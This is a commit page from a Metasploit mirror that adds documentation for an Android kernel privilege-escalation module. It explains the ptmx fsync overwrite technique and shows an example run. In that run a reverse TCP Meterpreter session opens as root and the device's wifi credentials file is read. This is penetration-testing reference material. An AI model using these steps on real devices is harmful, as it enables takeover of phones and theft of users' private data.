infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add documentation for put_user_vroot

bug/bundler_fix
Tim 2016-12-24 00:33:48 +08:00
parent c2dc350378
commit 16f2dc43e0
No known key found for this signature in database
GPG Key ID: 62361A8B17EEED19
1 changed files with 53 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
documentation/modules/exploit/android/local/put_user_vroot.md Normal file
View File

@ -0,0 +1,53 @@
## Intro
This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root priviledges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full priviledge on the device, and can access the entire filesystem and the private data files of every other app, including system apps.
The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit.
## Usage
You'll first need to obtain a session on the target device. Once the module is loaded, one simply needs to set the ```SESSION``` option and configure the handler. The exploit can take a while to run on the device so it is configured with ```WfsDelay``` option to wait 120 seconds for a session. If you have not had a session after this time you can assume the device is not vulnerable.
An example session follows:
```
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter dalvik/android u0_a132 @ localhost 192.168.1.52:4444 -> 192.168.1.54:33549 (192.168.1.54)
msf exploit(handler) > use exploit/android/local/put_user_vroot
msf exploit(put_user_vroot) > set LHOST 192.168.1.52
LHOST => 192.168.1.52
msf exploit(put_user_vroot) > set LPORT 5555
LPORT => 5555
msf exploit(put_user_vroot) > set SESSION 1
SESSION => 1
msf exploit(put_user_vroot) > run
[*] Started reverse TCP handler on 192.168.1.52:5555
[*] Loading exploit library /data/data/com.metasploit.stage/files/bwycy
[*] Loaded library /data/data/com.metasploit.stage/files/bwycy, deleting
[*] Waiting 120 seconds for payload
[*] Sending stage (388156 bytes) to 192.168.1.54
[*] Meterpreter session 2 opened (192.168.1.52:5555 -> 192.168.1.54:59580) at 2016-12-24 00:19:12 +0800
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > cat /data/misc/wifi/wpa_supplicant.conf
ctrl_interface=wlan0
...
```